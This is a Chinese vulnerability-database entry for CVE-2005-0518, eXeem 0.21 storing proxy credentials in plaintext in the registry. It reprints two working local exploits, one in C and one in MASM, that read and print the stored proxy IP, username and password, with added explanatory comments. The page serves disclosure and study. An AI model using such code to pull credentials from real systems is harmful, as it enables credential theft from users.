CVE-2005-0518
CVSS2.1
发布时间 :2005-02-23 00:00:00
修订时间 :2008-09-05 16:46:32
NMCOE    

[原文]eXeem 0.21 stores sensitive information such as passwords in plaintext in the Exeem registry key, which allows local users to gain privileges via the proxy_user and proxy_password values.


[CNNVD]eXeem Exeem注册表键敏感信息泄露漏洞(CNNVD-200502-089)

        eXeem是新一代Peer To Peer(P2P)软件。
        eXeem 0.21将密码之类的敏感信息以纯文本格式存储在Exeem注册表键中,这可让本地用户通过获取proxy_user和proxy_password值获取特权。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0518
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0518
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-089
(官方数据源) CNNVD

- 其它链接及资源

http://securitytracker.com/id?1013266
(VENDOR_ADVISORY)  SECTRACK  1013266

- 漏洞信息

eXeem Exeem注册表键敏感信息泄露漏洞
低危 未知
2005-02-23 00:00:00 2005-10-20 00:00:00
本地  
        eXeem是新一代Peer To Peer(P2P)软件。
        eXeem 0.21将密码之类的敏感信息以纯文本格式存储在Exeem注册表键中,这可让本地用户通过获取proxy_user和proxy_password值获取特权。

- 公告与补丁

        

- 漏洞信息 (834)

eXeem 0.21 Local Password Disclosure Exploit (EDBID:834)
windows local
2005-02-22 Verified
0 Kozan
N/A
/*****************************************************************

eXeem v0.21 Local Exploit by Kozan

Application: eXeem v0.21
Vendor: www.exeem.com
Vulnerable Description: eXeem v0.21 discloses passwords
for proxy settings to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com

*****************************************************************/

#include <stdio.h>
#include <windows.h>

/* Capacity, in bytes, of each buffer that receives a registry value. */
#define BUFSIZE 100

/* Handle of the registry key opened in main(). */
HKEY hKey;

/* One fixed-size buffer per proxy setting read from the key. */
char proxy_ip[BUFSIZE];
char proxy_username[BUFSIZE];
char proxy_password[BUFSIZE];

/* Byte count, starting out at the full buffer capacity. */
DWORD dwBufLen = BUFSIZE;

/* Holds a Win32 status code. */
LONG lRet;

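/*
 * Read one value from an open registry key into a BUFSIZE-byte buffer and
 * leave it NUL-terminated.
 *
 * key  - key handle opened with at least KEY_QUERY_VALUE access
 * name - name of the value under that key
 * out  - destination buffer of exactly BUFSIZE bytes
 *
 * Returns 1 when the value was read, 0 when RegQueryValueEx reported an
 * error (value missing, or data that does not fit in BUFSIZE - 1 bytes).
 */
static int read_value(HKEY key, const char *name, char *out)
{
    /*
     * The size argument is in/out: on return it holds the number of bytes
     * stored. Sharing one counter across queries shrinks the advertised
     * buffer after the first call, so it is re-armed here for every value.
     * One byte is held back because registry data is not guaranteed to
     * carry its own terminator, and the caller prints the buffer with %s.
     */
    DWORD size = BUFSIZE - 1;

    if (RegQueryValueEx(key, name, NULL, NULL, (LPBYTE) out, &size) != ERROR_SUCCESS) {
        return 0;
    }

    out[size] = '\0';   /* size <= BUFSIZE - 1, so this stays in bounds */
    return 1;
}

/*
 * Demonstration for CVE-2005-0518: eXeem 0.21 keeps its proxy settings,
 * password included, as plaintext values under
 * HKEY_CURRENT_USER\Software\Exeem. The program opens that key with
 * KEY_QUERY_VALUE access, reads the three values and prints them.
 *
 * Always returns 0; failures are reported on stdout only.
 */
int main(void)
{
    int ok;

    if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Exeem",
                     0, KEY_QUERY_VALUE, &hKey) != ERROR_SUCCESS) {
        printf("eXeem v0.21 is not installed on your pc!\n");
        return 0;
    }

    /* Short-circuit keeps the original order and stops at the first failure. */
    ok = read_value(hKey, "proxy_ip", proxy_ip)
      && read_value(hKey, "proxy_username", proxy_username)
      && read_value(hKey, "proxy_password", proxy_password);

    /* The handle is released on every path once the queries are done. */
    RegCloseKey(hKey);

    if (!ok) {
        printf("An error occured!\n");
        return 0;
    }

    printf("eXeem v0.21 Local Exploit by Kozan\n");
    printf("Credits to ATmaCA\n");
    printf("www.netmagister.com  -  www.spyinstructors.com \n\n");
    printf("Proxy IP           : %s\n", proxy_ip);
    printf("Proxy Username     : %s\n", proxy_username);
    printf("Proxy Password     : %s\n", proxy_password);

    return 0;
}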

// milw0rm.com [2005-02-22]
		

- 漏洞信息 (844)

eXeem 0.21 Local Password Disclosure Exploit (asm) (EDBID:844)
windows local
2005-02-26 Verified
0 illwill
N/A
;Nothing Special other than the program doesnt encode the proxy info.

.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
include \masm32\include\masm32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\masm32.lib
     ; literal: emits the quoted text as a NUL-terminated byte string in .data
     ; under a macro-local label, switches back to .code, and expands to that
     ; label.
     literal MACRO quoted_text:VARARG
       LOCAL local_text
       .data
         local_text db quoted_text,0
       .code
       EXITM <local_text>
     ENDM
     ; SADD: expands to "ADDR <label>" for an inline string so it can be used
     ; directly as an invoke argument (see the lstrcpy calls in the code section).
     SADD MACRO quoted_text:VARARG
       EXITM <ADDR literal(quoted_text)>
     ENDM
.data
   ; Registry subkey and value names queried by the code section. These are
   ; the plaintext proxy settings this page's CVE-2005-0518 entry describes.
   ; NOTE(review): MASM does not treat "\" as an escape character, so this
   ; literal holds a doubled backslash and a trailing one, unlike the
   ; "Software\\Exeem" C string in the other listing - confirm the key path.
   SubKey            db "Software\\Exeem\",0
   szIP              db "proxy_ip",0
   szUser            db "proxy_username",0
   szPass            db "proxy_password",0
   ; Messages and the wsprintf template; the three %s fields are filled from
   ; TheIPData, TheUSERData and ThePASSData in that order.
   noExeem           db "eXeem v0.2X is not installed on your pc!",0
   NotFound          db "Info NOT Stored.",0
   Theoutput  db   '_______________________________________________________________',13,10
              db   '*               Exeem v0.2X Local Proxy Pass Exploit          *',13,10
              db   '*                    Based On Kozans code in C                *',13,10
              db   '*                by illwill  - xillwillx@yahoo.com            *',13,10
              db   '*_____________________________________________________________*',13,10
              db   '                      Proxy IP: %s                             ',13,10
              db   '                      UserName: %s                             ',13,10
              db   '                      Password: %s                             ',13,10,0
   ; In/out byte count handed to every RegQueryValueEx call below.
   ; NOTE(review): 255 is larger than the 64-byte buffers it describes, and
   ; the value is never reset between calls - confirm the intended sizes.
   KeySize    DWORD 255
.data?
    ; One 64-byte buffer per queried value.
    TheIPData           db 64 dup (?)
    TheUSERData         db 64 dup (?)
    ThePASSData         db 64 dup (?)
    ; Receives the key handle from RegOpenKeyEx.
    TheReturn           DWORD ?
    ; Destination of the wsprintf call.
    ; NOTE(review): the Theoutput template alone appears longer than 258
    ; bytes, so the formatted text may not fit here - verify.
    strbuf              db 258 dup (0) 
.code
start:
    ; Open the subkey under HKEY_CURRENT_USER with KEY_READ access; the
    ; handle is written to TheReturn and the status comes back in eax.
    invoke RegOpenKeyEx, HKEY_CURRENT_USER,addr SubKey,0,KEY_READ,addr TheReturn
     .IF eax==ERROR_SUCCESS
        ; Query each value into its own buffer. Only KeySize is inspected
        ; afterwards; the status RegQueryValueEx returns in eax is not checked.
        ; A reported size below 2 bytes is replaced with the "NOT FOUND" text.
        invoke RegQueryValueEx,TheReturn,addr szIP,0,0,addr TheIPData, addr KeySize
                        .IF KeySize < 2
                             invoke lstrcpy,addr TheIPData,SADD("NOT FOUND")
                        .ENDIF
        invoke RegQueryValueEx,TheReturn,addr szUser,0,0,addr TheUSERData, addr KeySize
                        .IF KeySize < 2
                             invoke lstrcpy,addr TheUSERData,SADD("NOT FOUND")
                        .ENDIF
        invoke RegQueryValueEx,TheReturn,addr szPass,0,0,addr ThePASSData, addr KeySize
                         .IF KeySize < 2
                             invoke lstrcpy,addr ThePASSData,SADD("NOT FOUND")
                        .ENDIF
        ; Format the three buffers through the Theoutput template and print it.
        invoke wsprintf, addr strbuf, addr Theoutput,addr TheIPData,addr TheUSERData,addr ThePASSData
        invoke StdOut, addr strbuf
     .ELSE  
        ; Key could not be opened: report that the application is not installed.
        invoke StdOut, addr noExeem  
     .ENDIF
    ; NOTE(review): this close runs on both branches, so after a failed open
    ; TheReturn may not hold a valid handle.
    invoke RegCloseKey , TheReturn
   Invoke ExitProcess,0
end start

; milw0rm.com [2005-02-26]
		

- 漏洞信息

14139
eXeem Registry Local Password Disclosure
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-02-23 Unknown
2005-02-23 Unknown

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 
